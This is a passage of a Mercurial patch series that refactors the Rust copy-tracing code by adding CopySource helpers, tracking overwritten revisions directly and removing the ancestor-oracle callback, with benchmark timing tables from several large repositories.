Differential Revision: https://phab.mercurial-scm.org/D9643 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -15,7 +15,7 @@ type PathToken = usize; -#[derive(Clone, Debug, PartialEq, Copy)] +#[derive(Clone, Debug, PartialEq)] struct CopySource { /// revision at which the copy information was added rev: Revision, @@ -24,6 +24,42 @@ path: Option<PathToken>, } +impl CopySource { + /// create a new CopySource + /// + /// Use this when no previous copy source existed. + fn new(rev: Revision, path: Option<PathToken>) -> Self { + Self { rev, path } + } + + /// create a new CopySource from merging two others + /// + /// Use this when merging two InternalPathCopies requires active merging of + /// some entries. + fn new_from_merge(rev: Revision, winner: &Self, loser: &Self) -> Self { + Self { + rev, + path: winner.path, + } + } + + /// Update the value of a pre-existing CopySource + /// + /// Use this when recording copy information from parent → child edges + fn overwrite(&mut self, rev: Revision, path: Option<PathToken>) { + self.rev = rev; + self.path = path; + } + + /// Mark pre-existing copy information as "dropped" by a file deletion + /// + /// Use this when recording copy information from parent → child edges + fn mark_delete(&mut self, rev: Revision) { + self.rev = rev; + self.path = None; + } +} + /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) type InternalPathCopies = OrdMap<PathToken, CopySource>; @@ -521,17 +557,13 @@ // information. See merge_copies_dict for details. 
match copies.entry(dest) { Entry::Vacant(slot) => { - let ttpc = CopySource { - rev: current_rev, - path: entry, - }; + let ttpc = CopySource::new(current_rev, entry); slot.insert(ttpc); } Entry::Occupied(mut slot) => { - let mut ttpc = slot.get_mut(); + let ttpc = slot.get_mut(); oracle.record_overwrite(ttpc.rev, current_rev); - ttpc.rev = current_rev; - ttpc.path = entry; + ttpc.overwrite(current_rev, entry); } } } @@ -544,8 +576,7 @@ let deleted = path_map.tokenize(deleted_path); copies.entry(deleted).and_modify(|old| { oracle.record_overwrite(old.rev, current_rev); - old.rev = current_rev; - old.path = None; + old.mark_delete(current_rev); }); } } @@ -614,14 +645,22 @@ if overwrite { oracle.record_overwrite(src_minor.rev, current_merge); oracle.record_overwrite(src_major.rev, current_merge); - let path = match pick { - MergePick::Major => src_major.path, - MergePick::Minor => src_minor.path, - MergePick::Any => src_major.path, - }; - let src = CopySource { - rev: current_merge, - path, + let src = match pick { + MergePick::Major => CopySource::new_from_merge( + current_merge, + src_major, + &src_minor, + ), + MergePick::Minor => CopySource::new_from_merge( + current_merge, + &src_minor, + src_major, + ), + MergePick::Any => CopySource::new_from_merge( + current_merge, + src_major, + &src_minor, + ), }; major.insert(dest, src); } else { @@ -649,14 +688,22 @@ if overwrite { oracle.record_overwrite(src_minor.rev, current_merge); oracle.record_overwrite(src_major.rev, current_merge); - let path = match pick { - MergePick::Major => src_minor.path, - MergePick::Minor => src_major.path, - MergePick::Any => src_major.path, - }; - let src = CopySource { - rev: current_merge, - path, + let src = match pick { + MergePick::Major => CopySource::new_from_merge( + current_merge, + &src_major, + src_minor, + ), + MergePick::Minor => CopySource::new_from_merge( + current_merge, + src_minor, + &src_major, + ), + MergePick::Any => CopySource::new_from_merge( + current_merge, + 
&src_major, + src_minor, + ), }; minor.insert(dest, src); } else { @@ -706,16 +753,22 @@ if overwrite { oracle.record_overwrite(src_minor.rev, current_merge); oracle.record_overwrite(src_major.rev, current_merge); - let path = match pick { - MergePick::Major => src_major.path, - MergePick::Minor => src_minor.path, - // If the two entry are identical, no need to do - // anything (but diff should not have yield them) - MergePick::Any => src_major.path, - }; - let src = CopySource { - rev: current_merge, - path, + let src = match pick { + MergePick::Major => CopySource::new_from_merge( + current_merge, + src_major, + src_minor, + ), + MergePick::Minor => CopySource::new_from_merge( + current_merge, + src_minor, + src_major, + ), + MergePick::Any => CopySource::new_from_merge( + current_merge, + src_major, + src_minor, + ), }; to_minor(dest, &src); to_major(dest, &src); # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608051863 -3600 # Tue Dec 15 18:04:23 2020 +0100 # Node ID 0d840b9d200d3de5d9ee6ef5eddd2b0b0cee6743 # Parent b6f65d90e8af3aabed7e85304d6ffa3d2dda485b copies-rust: track "overwrites" directly within CopySource Overwrite are "rare enough" that explicitly keeping track of them is going to be "cheap", or at least much cheaper that issuing many `is_ancestor` calls. Even a simple implementation using no specific optimisation (eg: using the generic HashSet type) yield good result in most cases. They are interesting optimization to can do on top of that. We will implement them in later changesets. We tried different approach to speed up the overwrite detection and this one seems the most promising. Without further optimization, we already see sizable speedup on various cases. 
Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 5.138169 s, 4.482399 s, -0.655770 s, × 0.8724, 12 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 5.127809 s, 4.480366 s, -0.647443 s, × 0.8737, 12 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.971136 s, 4.369070 s, -0.602066 s, × 0.8789, 12 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 1.741678 s, 1.592506 s, -0.149172 s, × 0.9144, 8 µs/rev However, some of the case doing a lot of overwrite get significantly slower. The one with a really problematic slowdown are the special "head reducing" merge in mozilla-try so I am not too worried about them. In addition, further changeset are going to improve the performance of all this. 
Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 1.343373 s, 2.119204 s, +0.775831 s, × 1.5775, 21 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 40.314822 s, 87.824489 s, +47.509667 s, × 2.1785, 383 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 20.048029 s, 43.304637 s, +23.256608 s, × 2.1600, 113 µs/rev Full benchmark below: Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mercurial x_revs_x_added_0_copies ad6b123de1c7 39cfcef4f463 : 1 revs, 0.000042 s, 0.000043 s, +0.000001 s, × 1.0238, 43 µs/rev mercurial x_revs_x_added_x_copies 2b1c78674230 0c1d10351869 : 6 revs, 0.000110 s, 0.000114 s, +0.000004 s, × 1.0364, 19 µs/rev mercurial x000_revs_x000_added_x_copies 81f8ff2a9bf2 dd3267698d84 : 1032 revs, 0.004945 s, 0.004937 s, -0.000008 s, × 0.9984, 4 µs/rev pypy x_revs_x_added_0_copies aed021ee8ae8 099ed31b181b : 9 revs, 0.000192 s, 0.000339 s, +0.000147 s, × 1.7656, 37 µs/rev pypy x_revs_x000_added_0_copies 4aa4e1f8e19a 359343b9ac0e : 1 revs, 0.000049 s, 0.000049 s, +0.000000 s, × 1.0000, 49 µs/rev pypy x_revs_x_added_x_copies ac52eb7bbbb0 72e022663155 : 7 revs, 0.000112 s, 0.000202 s, +0.000090 s, × 1.8036, 28 µs/rev pypy x_revs_x00_added_x_copies c3b14617fbd7 ace7255d9a26 : 1 revs, 0.000323 s, 0.000409 s, +0.000086 s, × 1.2663, 409 µs/rev pypy x_revs_x000_added_x000_copies df6f7a526b60 a83dc6a2d56f : 6 revs, 0.010042 s, 0.011984 s, +0.001942 s, × 1.1934, 1997 µs/rev pypy 
x000_revs_xx00_added_0_copies 89a76aede314 2f22446ff07e : 4785 revs, 0.049813 s, 0.050820 s, +0.001007 s, × 1.0202, 10 µs/rev pypy x000_revs_x000_added_x_copies 8a3b5bfd266e 2c68e87c3efe : 6780 revs, 0.079937 s, 0.087953 s, +0.008016 s, × 1.1003, 12 µs/rev pypy x000_revs_x000_added_x000_copies 89a76aede314 7b3dda341c84 : 5441 revs, 0.059412 s, 0.062902 s, +0.003490 s, × 1.0587, 11 µs/rev pypy x0000_revs_x_added_0_copies d1defd0dc478 c9cb1334cc78 : 43645 revs, 0.533769 s, 0.679234 s, +0.145465 s, × 1.2725, 15 µs/rev pypy x0000_revs_xx000_added_0_copies bf2c629d0071 4ffed77c095c : 2 revs, 0.013147 s, 0.013095 s, -0.000052 s, × 0.9960, 6547 µs/rev pypy x0000_revs_xx000_added_x000_copies 08ea3258278e d9fa043f30c0 : 11316 revs, 0.110680 s, 0.120910 s, +0.010230 s, × 1.0924, 10 µs/rev netbeans x_revs_x_added_0_copies fb0955ffcbcd a01e9239f9e7 : 2 revs, 0.000085 s, 0.000087 s, +0.000002 s, × 1.0235, 43 µs/rev netbeans x_revs_x000_added_0_copies 6f360122949f 20eb231cc7d0 : 2 revs, 0.000107 s, 0.000107 s, +0.000000 s, × 1.0000, 53 µs/rev netbeans x_revs_x_added_x_copies 1ada3faf6fb6 5a39d12eecf4 : 3 revs, 0.000175 s, 0.000186 s, +0.000011 s, × 1.0629, 62 µs/rev netbeans x_revs_x00_added_x_copies 35be93ba1e2c 9eec5e90c05f : 9 revs, 0.000720 s, 0.000754 s, +0.000034 s, × 1.0472, 83 µs/rev netbeans x000_revs_xx00_added_0_copies eac3045b4fdd 51d4ae7f1290 : 1421 revs, 0.010019 s, 0.010443 s, +0.000424 s, × 1.0423, 7 µs/rev netbeans x000_revs_x000_added_x_copies e2063d266acd 6081d72689dc : 1533 revs, 0.015602 s, 0.015697 s, +0.000095 s, × 1.0061, 10 µs/rev netbeans x000_revs_x000_added_x000_copies ff453e9fee32 411350406ec2 : 5750 revs, 0.058759 s, 0.063528 s, +0.004769 s, × 1.0812, 11 µs/rev netbeans x0000_revs_xx000_added_x000_copies 588c2d1ced70 1aad62e59ddd : 66949 revs, 0.491550 s, 0.545515 s, +0.053965 s, × 1.1098, 8 µs/rev mozilla-central x_revs_x_added_0_copies 3697f962bb7b 7015fcdd43a2 : 2 revs, 0.000087 s, 0.000089 s, +0.000002 s, × 1.0230, 44 µs/rev mozilla-central 
x_revs_x000_added_0_copies dd390860c6c9 40d0c5bed75d : 8 revs, 0.000268 s, 0.000265 s, -0.000003 s, × 0.9888, 33 µs/rev mozilla-central x_revs_x_added_x_copies 8d198483ae3b 14207ffc2b2f : 9 revs, 0.000181 s, 0.000381 s, +0.000200 s, × 2.1050, 42 µs/rev mozilla-central x_revs_x00_added_x_copies 98cbc58cc6bc 446a150332c3 : 7 revs, 0.000661 s, 0.000672 s, +0.000011 s, × 1.0166, 96 µs/rev mozilla-central x_revs_x000_added_x000_copies 3c684b4b8f68 0a5e72d1b479 : 3 revs, 0.003256 s, 0.003497 s, +0.000241 s, × 1.0740, 1165 µs/rev mozilla-central x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.066749 s, 0.073204 s, +0.006455 s, × 1.0967, 12200 µs/rev mozilla-central x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006462 s, 0.006482 s, +0.000020 s, × 1.0031, 4 µs/rev mozilla-central x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.004919 s, 0.005066 s, +0.000147 s, × 1.0299, 123 µs/rev mozilla-central x000_revs_x000_added_x000_copies 7c97034feb78 4407bd0c6330 : 7839 revs, 0.062421 s, 0.065707 s, +0.003286 s, × 1.0526, 8 µs/rev mozilla-central x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.026633 s, 0.026800 s, +0.000167 s, × 1.0063, 43 µs/rev mozilla-central x0000_revs_xx000_added_x000_copies f78c615a656c 96a38b690156 : 30263 revs, 0.197792 s, 0.203856 s, +0.006064 s, × 1.0307, 6 µs/rev mozilla-central x00000_revs_x0000_added_x0000_copies 6832ae71433c 4c222a1d9a00 : 153721 revs, 1.259970 s, 1.293394 s, +0.033424 s, × 1.0265, 8 µs/rev mozilla-central x00000_revs_x00000_added_x000_copies 76caed42cf7c 1daa622bbe42 : 204976 revs, 1.689184 s, 1.698239 s, +0.009055 s, × 1.0054, 8 µs/rev mozilla-try x_revs_x_added_0_copies aaf6dde0deb8 9790f499805a : 2 revs, 0.000865 s, 0.000875 s, +0.000010 s, × 1.0116, 437 µs/rev mozilla-try x_revs_x000_added_0_copies d8d0222927b4 5bb8ce8c7450 : 2 revs, 0.000893 s, 0.000891 s, -0.000002 s, × 0.9978, 445 µs/rev mozilla-try x_revs_x_added_x_copies 
092fcca11bdb 936255a0384a : 4 revs, 0.000172 s, 0.000292 s, +0.000120 s, × 1.6977, 73 µs/rev mozilla-try x_revs_x00_added_x_copies b53d2fadbdb5 017afae788ec : 2 revs, 0.001159 s, 0.003939 s, +0.002780 s, × 3.3986, 1969 µs/rev mozilla-try x_revs_x000_added_x000_copies 20408ad61ce5 6f0ee96e21ad : 1 revs, 0.031621 s, 0.033027 s, +0.001406 s, × 1.0445, 33027 µs/rev mozilla-try x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.068571 s, 0.073703 s, +0.005132 s, × 1.0748, 12283 µs/rev mozilla-try x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006452 s, 0.006469 s, +0.000017 s, × 1.0026, 4 µs/rev mozilla-try x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005443 s, 0.005278 s, -0.000165 s, × 0.9697, 128 µs/rev mozilla-try x000_revs_x000_added_x000_copies 1346fd0130e4 4c65cbdabc1f : 6657 revs, 0.063180 s, 0.064995 s, +0.001815 s, × 1.0287, 9 µs/rev mozilla-try x0000_revs_x_added_0_copies 63519bfd42ee a36a2a865d92 : 40314 revs, 0.293564 s, 0.301041 s, +0.007477 s, × 1.0255, 7 µs/rev mozilla-try x0000_revs_x_added_x_copies 9fe69ff0762d bcabf2a78927 : 38690 revs, 0.286595 s, 0.285575 s, -0.001020 s, × 0.9964, 7 µs/rev mozilla-try x0000_revs_xx000_added_x_copies 156f6e2674f2 4d0f2c178e66 : 8598 revs, 0.083256 s, 0.085597 s, +0.002341 s, × 1.0281, 9 µs/rev mozilla-try x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027282 s, 0.027118 s, -0.000164 s, × 0.9940, 44 µs/rev mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 1.343373 s, 2.119204 s, +0.775831 s, × 1.5775, 21 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 0.665737 s, 0.701479 s, +0.035742 s, × 1.0537, 13 µs/rev mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 5.138169 s, 4.482399 s, -0.655770 s, × 0.8724, 12 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 0.573276 s, 
0.574082 s, +0.000806 s, × 1.0014, 16 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 5.127809 s, 4.480366 s, -0.647443 s, × 0.8737, 12 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.971136 s, 4.369070 s, -0.602066 s, × 0.8789, 12 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 1.741678 s, 1.592506 s, -0.149172 s, × 0.9144, 8 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 40.314822 s, 87.824489 s, +47.509667 s, × 2.1785, 383 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 20.048029 s, 43.304637 s, +23.256608 s, × 2.1600, 113 µs/rev private : 459513 revs, 37.179470 s, 33.853687 s, -3.325783 s, × 0.9105, 73 µs/rev Differential Revision: https://phab.mercurial-scm.org/D9644 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -9,6 +9,7 @@ use std::cmp::Ordering; use std::collections::HashMap; +use std::collections::HashSet; use std::convert::TryInto; pub type PathCopies = HashMap<HgPathBuf, HgPathBuf>; @@ -22,6 +23,9 @@ /// the copy source, (Set to None in case of deletion of the associated /// key) path: Option<PathToken>, + /// a set of previous `CopySource.rev` value directly or indirectly + /// overwritten by this one. + overwritten: HashSet<Revision>, } impl CopySource { @@ -29,7 +33,11 @@ /// /// Use this when no previous copy source existed. fn new(rev: Revision, path: Option<PathToken>) -> Self { - Self { rev, path } + Self { + rev, + path, + overwritten: HashSet::new(), + } } /// create a new CopySource from merging two others @@ -37,9 +45,15 @@ /// Use this when merging two InternalPathCopies requires active merging of /// some entries. 
fn new_from_merge(rev: Revision, winner: &Self, loser: &Self) -> Self { + let mut overwritten = HashSet::new(); + overwritten.extend(winner.overwritten.iter().copied()); + overwritten.extend(loser.overwritten.iter().copied()); + overwritten.insert(winner.rev); + overwritten.insert(loser.rev); Self { rev, path: winner.path, + overwritten: overwritten, } } @@ -47,6 +61,7 @@ /// /// Use this when recording copy information from parent → child edges fn overwrite(&mut self, rev: Revision, path: Option<PathToken>) { + self.overwritten.insert(self.rev); self.rev = rev; self.path = path; } @@ -55,9 +70,14 @@ /// /// Use this when recording copy information from parent → child edges fn mark_delete(&mut self, rev: Revision) { + self.overwritten.insert(self.rev); self.rev = rev; self.path = None; } + + fn is_overwritten_by(&self, other: &Self) -> bool { + other.overwritten.contains(&self.rev) + } } /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) @@ -834,8 +854,12 @@ if src_major.path.is_none() { // We cannot get different copy information for both p1 and p2 // from the same revision. Unless this was a - // deletion - (MergePick::Any, false) + // deletion. + // + // However the deletion might come over different data on each + // branch. 
+ let need_over = src_major.overwritten != src_minor.overwritten; + (MergePick::Any, need_over) } else { unreachable!(); } @@ -852,10 +876,11 @@ // we have the same value, but from other source; if src_major.rev == src_minor.rev { // If the two entry are identical, they are both valid + debug_assert!(src_minor.overwritten == src_minor.overwritten); (MergePick::Any, false) - } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { + } else if src_major.is_overwritten_by(src_minor) { (MergePick::Minor, false) - } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { + } else if src_minor.is_overwritten_by(src_major) { (MergePick::Major, false) } else { (MergePick::Any, true) @@ -884,7 +909,7 @@ // salvaged by the merge, unconditionnaly preserve the // major side. (MergePick::Major, true) - } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { + } else if src_minor.is_overwritten_by(src_major) { // The information from the minor version are strictly older than // the major version if action == MergeCase::Merged { @@ -898,7 +923,7 @@ // No activity on the minor branch, pick the newer one. (MergePick::Major, false) } - } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { + } else if src_major.is_overwritten_by(src_minor) { if action == MergeCase::Merged { // If the file was actively merged, its means some non-copy // activity happened on the other branch. It # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608052977 -3600 # Tue Dec 15 18:22:57 2020 +0100 # Node ID 34827c95092ce7d70e2242cb6370d1133b30bb4c # Parent 0d840b9d200d3de5d9ee6ef5eddd2b0b0cee6743 copies-rust: remove the ancestor Oracle logic We are not doing any `is_ancestor` call anymore. So we can drop that logic and associated arguments. 
Differential Revision: https://phab.mercurial-scm.org/D9645 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -363,7 +363,7 @@ if rustmod is not None: final_copies = rustmod.combine_changeset_copies( - list(revs), children_count, targetrev, revinfo, isancestor + list(revs), children_count, targetrev, revinfo ) else: isancestor = cached_is_ancestor(isancestor) diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -281,46 +281,6 @@ } } -/// A struct responsible for answering "is X ancestors of Y" quickly -/// -/// The structure will delegate ancestors call to a callback, and cache the -/// result. -#[derive(Debug)] -struct AncestorOracle<'a, A: Fn(Revision, Revision) -> bool> { - inner: &'a A, - pairs: HashMap<(Revision, Revision), bool>, -} - -impl<'a, A: Fn(Revision, Revision) -> bool> AncestorOracle<'a, A> { - fn new(func: &'a A) -> Self { - Self { - inner: func, - pairs: HashMap::default(), - } - } - - fn record_overwrite(&mut self, anc: Revision, desc: Revision) { - self.pairs.insert((anc, desc), true); - } - - /// returns `true` if `anc` is an ancestors of `desc`, `false` otherwise - fn is_overwrite(&mut self, anc: Revision, desc: Revision) -> bool { - if anc > desc { - false - } else if anc == desc { - true - } else { - if let Some(b) = self.pairs.get(&(anc, desc)) { - *b - } else { - let b = (self.inner)(anc, desc); - self.pairs.insert((anc, desc), b); - b - } - } - } -} - struct ActionsIterator<'a> { changes: &'a ChangedFiles<'a>, parent: Parent, @@ -419,15 +379,13 @@ /// * ChangedFiles /// isancestors(low_rev, high_rev): callback to check if a revision is an /// ancestor of another -pub fn combine_changeset_copies<A: Fn(Revision, Revision) -> bool, D>( +pub fn combine_changeset_copies<D>( revs: Vec<Revision>, mut children_count: HashMap<Revision, usize>, target_rev: Revision, rev_info: 
RevInfoMaker<D>, - is_ancestor: &A, ) -> PathCopies { let mut all_copies = HashMap::new(); - let mut oracle = AncestorOracle::new(is_ancestor); let mut path_map = TwoWayPathMap::default(); @@ -450,7 +408,6 @@ // combine it with data for that revision let vertex_copies = add_from_changes( &mut path_map, - &mut oracle, &parent_copies, &changes, Parent::FirstParent, @@ -471,7 +428,6 @@ // combine it with data for that revision let vertex_copies = add_from_changes( &mut path_map, - &mut oracle, &parent_copies, &changes, Parent::SecondParent, @@ -491,7 +447,6 @@ vertex_copies, copies, &changes, - &mut oracle, )), }; } @@ -548,9 +503,8 @@ /// Combine ChangedFiles with some existing PathCopies information and return /// the result -fn add_from_changes<A: Fn(Revision, Revision) -> bool>( +fn add_from_changes( path_map: &mut TwoWayPathMap, - oracle: &mut AncestorOracle<A>, base_copies: &InternalPathCopies, changes: &ChangedFiles, parent: Parent, @@ -582,7 +536,6 @@ } Entry::Occupied(mut slot) => { let ttpc = slot.get_mut(); - oracle.record_overwrite(ttpc.rev, current_rev); ttpc.overwrite(current_rev, entry); } } @@ -595,7 +548,6 @@ // InternalPathCopies object. let deleted = path_map.tokenize(deleted_path); copies.entry(deleted).and_modify(|old| { - oracle.record_overwrite(old.rev, current_rev); old.mark_delete(current_rev); }); } @@ -608,31 +560,27 @@ /// /// In case of conflict, value from "major" will be picked, unless in some /// cases. See inline documentation for details. -fn merge_copies_dict<A: Fn(Revision, Revision) -> bool>( +fn merge_copies_dict( path_map: &TwoWayPathMap, current_merge: Revision, mut minor: InternalPathCopies, mut major: InternalPathCopies, changes: &ChangedFiles, - oracle: &mut AncestorOracle<A>, ) -> InternalPathCopies { // This closure exist as temporary help while multiple developper are // actively working on this code. Feel free to re-inline it once this // code is more settled. 
- let cmp_value = |oracle: &mut AncestorOracle<A>, - dest: &PathToken, - src_minor: &CopySource, - src_major: &CopySource| { - compare_value( - path_map, - current_merge, - changes, - oracle, - dest, - src_minor, - src_major, - ) - }; + let cmp_value = + |dest: &PathToken, src_minor: &CopySource, src_major: &CopySource| { + compare_value( + path_map, + current_merge, + changes, + dest, + src_minor, + src_major, + ) + }; if minor.is_empty() { major } else if major.is_empty() { @@ -661,10 +609,8 @@ } Some(src_major) => { let (pick, overwrite) = - cmp_value(oracle, &dest, &src_minor, src_major); + cmp_value(&dest, &src_minor, src_major); if overwrite { - oracle.record_overwrite(src_minor.rev, current_merge); - oracle.record_overwrite(src_major.rev, current_merge); let src = match pick { MergePick::Major => CopySource::new_from_merge( current_merge, @@ -704,10 +650,8 @@ } Some(src_minor) => { let (pick, overwrite) = - cmp_value(oracle, &dest, src_minor, &src_major); + cmp_value(&dest, src_minor, &src_major); if overwrite { - oracle.record_overwrite(src_minor.rev, current_merge); - oracle.record_overwrite(src_major.rev, current_merge); let src = match pick { MergePick::Major => CopySource::new_from_merge( current_merge, @@ -769,10 +713,8 @@ let (dest, src_major) = new; let (_, src_minor) = old; let (pick, overwrite) = - cmp_value(oracle, dest, src_minor, src_major); + cmp_value(dest, src_minor, src_major); if overwrite { - oracle.record_overwrite(src_minor.rev, current_merge); - oracle.record_overwrite(src_major.rev, current_merge); let src = match pick { MergePick::Major => CopySource::new_from_merge( current_merge, @@ -840,11 +782,10 @@ /// decide which side prevails in case of conflicting values #[allow(clippy::if_same_then_else)] -fn compare_value<A: Fn(Revision, Revision) -> bool>( +fn compare_value( path_map: &TwoWayPathMap, current_merge: Revision, changes: &ChangedFiles, - oracle: &mut AncestorOracle<A>, dest: &PathToken, src_minor: &CopySource, src_major: 
&CopySource, diff --git a/rust/hg-cpython/src/copy_tracing.rs b/rust/hg-cpython/src/copy_tracing.rs --- a/rust/hg-cpython/src/copy_tracing.rs +++ b/rust/hg-cpython/src/copy_tracing.rs @@ -1,5 +1,4 @@ use cpython::ObjectProtocol; -use cpython::PyBool; use cpython::PyBytes; use cpython::PyDict; use cpython::PyList; @@ -26,32 +25,10 @@ children_count: PyDict, target_rev: Revision, rev_info: PyObject, - is_ancestor: PyObject, ) -> PyResult<PyDict> { let revs: PyResult<_> = revs.iter(py).map(|r| Ok(r.extract(py)?)).collect(); - // Wrap the `is_ancestor` python callback as a Rust closure - // - // No errors are expected from the Python side, and they will should only - // happens in case of programing error or severe data corruption. Such - // errors will raise panic and the rust-cpython harness will turn them into - // Python exception. - let is_ancestor_wrap = |anc: Revision, desc: Revision| -> bool { - is_ancestor - .call(py, (anc, desc), None) - .expect( - "rust-copy-tracing: python call to `is_ancestor` \ - failed", - ) - .cast_into::<PyBool>(py) - .expect( - "rust-copy-tracing: python call to `is_ancestor` \ - returned unexpected non-Bool value", - ) - .is_true() - }; - // Wrap the `rev_info_maker` python callback as a Rust closure // // No errors are expected from the Python side, and they will should only @@ -104,7 +81,6 @@ children_count?, target_rev, rev_info_maker, - &is_ancestor_wrap, ); let out = PyDict::new(py); for (dest, source) in res.into_iter() { @@ -134,8 +110,7 @@ revs: PyList, children: PyDict, target_rev: Revision, - rev_info: PyObject, - is_ancestor: PyObject + rev_info: PyObject ) ), )?; # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608107425 -3600 # Wed Dec 16 09:30:25 2020 +0100 # Node ID 389b0328b7896766998c203bb6fa96bdbcbee41e # Parent 34827c95092ce7d70e2242cb6370d1133b30bb4c copies-rust: get the parents' copies earlier This remove some conditional nesting and prepare for future work were we will unify 
the handling of copies from p1 and p2. Differential Revision: https://phab.mercurial-scm.org/D9646 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -397,59 +397,60 @@ // the individual copies information the curent revision. Creating a // new TimeStampedPath for each `rev` → `children` vertex. let mut copies: Option<InternalPathCopies> = None; - if p1 != NULL_REVISION { - // Retrieve data computed in a previous iteration - let parent_copies = get_and_clean_parent_copies( + // Retrieve data computed in a previous iteration + let p1_copies = match p1 { + NULL_REVISION => None, + _ => get_and_clean_parent_copies( &mut all_copies, &mut children_count, p1, - ); - if let Some(parent_copies) = parent_copies { - // combine it with data for that revision - let vertex_copies = add_from_changes( - &mut path_map, - &parent_copies, - &changes, - Parent::FirstParent, - rev, - ); - // keep that data around for potential later combination - copies = Some(vertex_copies); - } - } - if p2 != NULL_REVISION { - // Retrieve data computed in a previous iteration - let parent_copies = get_and_clean_parent_copies( + ), // will be None if the vertex is not to be traversed + }; + let p2_copies = match p2 { + NULL_REVISION => None, + _ => get_and_clean_parent_copies( &mut all_copies, &mut children_count, p2, + ), // will be None if the vertex is not to be traversed + }; + if let Some(parent_copies) = p1_copies { + // combine it with data for that revision + let vertex_copies = add_from_changes( + &mut path_map, + &parent_copies, + &changes, + Parent::FirstParent, + rev, ); - if let Some(parent_copies) = parent_copies { - // combine it with data for that revision - let vertex_copies = add_from_changes( - &mut path_map, - &parent_copies, - &changes, - Parent::SecondParent, - rev, - ); + // keep that data around for potential later combination + copies = Some(vertex_copies); + } + if 
let Some(parent_copies) = p2_copies { + // combine it with data for that revision + let vertex_copies = add_from_changes( + &mut path_map, + &parent_copies, + &changes, + Parent::SecondParent, + rev, + ); - copies = match copies { - None => Some(vertex_copies), - // Merge has two parents needs to combines their copy - // information. - // - // If we got data from both parents, We need to combine - // them. - Some(copies) => Some(merge_copies_dict( - &path_map, - rev, - vertex_copies, - copies, - &changes, - )), - }; - } + copies = match copies { + None => Some(vertex_copies), + // Merge has two parents needs to combines their copy + // information. + // + // If we got data from both parents, We need to combine + // them. + Some(copies) => Some(merge_copies_dict( + &path_map, + rev, + vertex_copies, + copies, + &changes, + )), + }; } match copies { Some(copies) => { # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608108124 -3600 # Wed Dec 16 09:42:04 2020 +0100 # Node ID f8bdc8329d7718d86976c8b601a67c0c02dd0303 # Parent 389b0328b7896766998c203bb6fa96bdbcbee41e copies-rust: use matching to select the final copies information This is a bit more idiomatic and this prepare a future refactoring where InternalCopies from both parent would be updated at the same time. 
